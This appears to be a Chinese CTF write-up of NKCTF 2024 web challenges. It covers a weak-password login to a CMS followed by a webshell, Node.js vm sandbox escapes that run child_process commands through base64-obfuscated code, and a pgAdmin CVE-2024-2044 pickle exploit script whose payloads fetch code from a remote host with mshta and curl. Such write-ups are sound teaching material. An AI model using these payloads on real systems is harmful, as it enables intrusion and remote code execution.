2024NKCTF_WP

在大家的一同努力之下获取了第四

欸,好爽

my first cms

打开看到是个cms 网上搜了一圈 是CMSMS

image-20240323191726863

一个php+mysql+smarty写的cms

dirsearch扫描一下,看到存在admin/login.php路由,直接简单访问

image-20240323191834639

弱密码 admin/Admin123成功登录

出题人卡字典,良心大大滴坏

网上搜搜这个cms的漏洞

看到两个可能的

https://github.com/capture0x/CMSMadeSimple

capture0x/CMSMadeSimple2: CMS Made Simple Version: 2.2.19 - SSTI (github.com)

注意到使用ssti注入的时候会遇到一个setting,绕不过去

前面那个可以

image-20240323192648185

没有办法直接读取文件,尝试写马

image-20240323192717004

antsword链接

image-20240323192731376

全世界最简单的CTF

访问/secret获取源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54

const express = require('express');
const bodyParser = require('body-parser');
const app = express();
const fs = require("fs");
const path = require('path');
const vm = require("vm");

app
.use(bodyParser.json())
.set('views', path.join(__dirname, 'views'))
.use(express.static(path.join(__dirname, '/public')))

app.get('/', function (req, res){
res.sendFile(__dirname + '/public/home.html');
})


function waf(code) {
let pattern = /(process|\[.*?\]|exec|spawn|Buffer|\\|\+|concat|eval|Function)/g;
if(code.match(pattern)){
throw new Error("what can I say? hacker out!!");
}
}

app.post('/', function (req, res){
let code = req.body.code;
let sandbox = Object.create(null);
let context = vm.createContext(sandbox);
try {
waf(code)
let result = vm.runInContext(code, context);
console.log(result);
} catch (e){
console.log(e.message);
require('./hack');
}
})

app.get('/secret', function (req, res){
if(process.__filename == null) {
let content = fs.readFileSync(__filename, "utf-8");
return res.send(content);
} else {
let content = fs.readFileSync(process.__filename, "utf-8");
return res.send(content);
}
})


app.listen(3000, ()=>{
console.log("listen on 3000");
})

vm逃逸 过滤了很多东西

存在try catch方法 应该是使用proxy方法,报错执行

1
2
3
4
5
6
7
8
9
`
throw new Proxy({}, {
get: function(){
const cc = arguments.callee.caller;
const p = (cc.constructor.constructor('return process'))();
return p.mainModule.require('child_process').execSync('whoami').toString();
}
})
`

通过污染tostring属性和proxy报错回显,完成一个注入

注意到

1
2
3
4
5
6
7
8
9
10
app.get('/secret', function (req, res){
if(process.__filename == null) {
let content = fs.readFileSync(__filename, "utf-8");
return res.send(content);
} else {
let content = fs.readFileSync(process.__filename, "utf-8");
return res.send(content);
}
})

我们可以利用process污染__filename属性 达到读取任意文件的目的

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
const vm = require("vm");

function waf(code) {
let pattern = /(process|\[.*?\]|exec|spawn|Buffer|\\|\+|concat|eval|Function)/g;
if(code.match(pattern)){
throw new Error("what can I say? hacker out!!");
}
}

const script =
`(() => {
  throw new Proxy({}, {
    get: function(){
      const c = arguments.callee.caller;
      const p = (c.constructor.constructor('return pr'%2b'ocess'))();
      p.__filename = "/flag";
      return "\\n";
   }
  })
  })()`;


let sandbox = Object.create(null);
let context = vm.createContext(sandbox);
// let process.__filename='test';

// console.log(process.__filename);

try {
// waf(code)
const result = vm.runInContext(script, context);
console.log('test'+result);
} catch (e){
console.log('fail'+e.message);

}
console.log(process.__filename);

现在问题来到了怎么绕过

正常的+ [] join啥的都寄了,没法绕过

https://www.zhangshengrong.com/p/bYXxqOkL1Z/

参考这个文章,base64绕过,读取文件

1
2
3
4
5
6
7
8
  get: function() {
const cc = arguments.callee.caller;
const global = (cc.constructor.constructor('return global'))();
const pp = Reflect.get(Object.values(Reflect.get(global, Reflect.ownKeys(global).find(x=>x.startsWith(`Buf`)))),1)(`cmV0dXJuIHByb2Nlc3M=`,`base64`).toString();
const p = (cc.constructor.constructor(pp))();
p.__filename="/flag";
}
})

ok读取不到,看来要rce

image-20240323194453436

测试了一下,好像不出我网,考虑echo读取文件之后,污染相关的__filename读取文件

1
2
3
4
5
6
7
8
9
10
11
12
throw new Proxy({}, {
get: function() {
const cc = arguments.callee.caller;
const global = (cc.constructor.constructor('return global'))();
const return_Process = Reflect.get(Object.values(Reflect.get(global, Reflect.ownKeys(global).find(x=>x.startsWith(`Buf`)))),1)(`cmV0dXJuIHByb2Nlc3M=`,`base64`).toString();
const Process = (cc.constructor.constructor(return_Process))();
Process.__filename="1";
const re = Reflect.get(global, Reflect.ownKeys(global).find(x=>x.includes('eva')));
const an = Reflect.get(Object.values(Reflect.get(global, Reflect.ownKeys(global).find(x=>x.startsWith(`Buf`)))),1)(`Z2xvYmFsLnByb2Nlc3MubWFpbk1vZHVsZS5jb25zdHJ1Y3Rvci5fbG9hZCgiY2hpbGRfcHJvY2VzcyIpLmV4ZWNTeW5jKCIvcmVhZGZsYWcgPjEiKQ==`,`base64`).toString();
re(an);
}
})

然后访问/secret即可

分析

此题目实际上是出网的,只是忘记了[]被过滤,网上看到很多的师傅也是成功的弹shell穿了这个题目

arguments.callee.caller可以获取沙箱外的一个对象,外面可以利用这个点完成攻击

porcess显然是没有这个__filename的对象的,所以回去prototype里面去寻找相关的__filename去寻找 通过’./hack.js’ 然后污染shell.js的内容完成rce

解题方法还是很多的,欢迎大家讨论

tacooooo

hint给了提示是attack_tacooooo,猜测密码就是tacooooo 直接登录

发现是pgAdminv8.3

搜获cve Unsafe Deserialization and Remote Code Execution by an Authenticated user in pgAdmin 4 (CVE-2024-2044) · Issue #7258 · pgadmin-org/pgadmin4 (github.com)

直接下载一个脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
import struct
import sys

def produce_pickle_bytes(platform, cmd):
b = b'\x80\x04\x95'
b += struct.pack('L', 22 + len(platform) + len(cmd))
b += b'\x8c' + struct.pack('b', len(platform)) + platform.encode()
b += b'\x94\x8c\x06system\x94\x93\x94'
b += b'\x8c' + struct.pack('b', len(cmd)) + cmd.encode()
b += b'\x94\x85\x94R\x94.'
print(b)
return b

if __name__ == '__main__':
if len(sys.argv) != 2:
exit(f"usage: {sys.argv[0]} ip:port")
with open('nt.pickle', 'wb') as f:
f.write(produce_pickle_bytes('nt', f"mshta.exe http://{HOST}/"))
with open('posix.pickle', 'wb') as f:
f.write(produce_pickle_bytes('posix', f"curl http://{HOST}/"))

题目表示无bash 无curl

./busybox sh可以这样

在环境变量内找到flag

用过就是熟悉

mvc架构的php审计,先放着,学了在拿来分析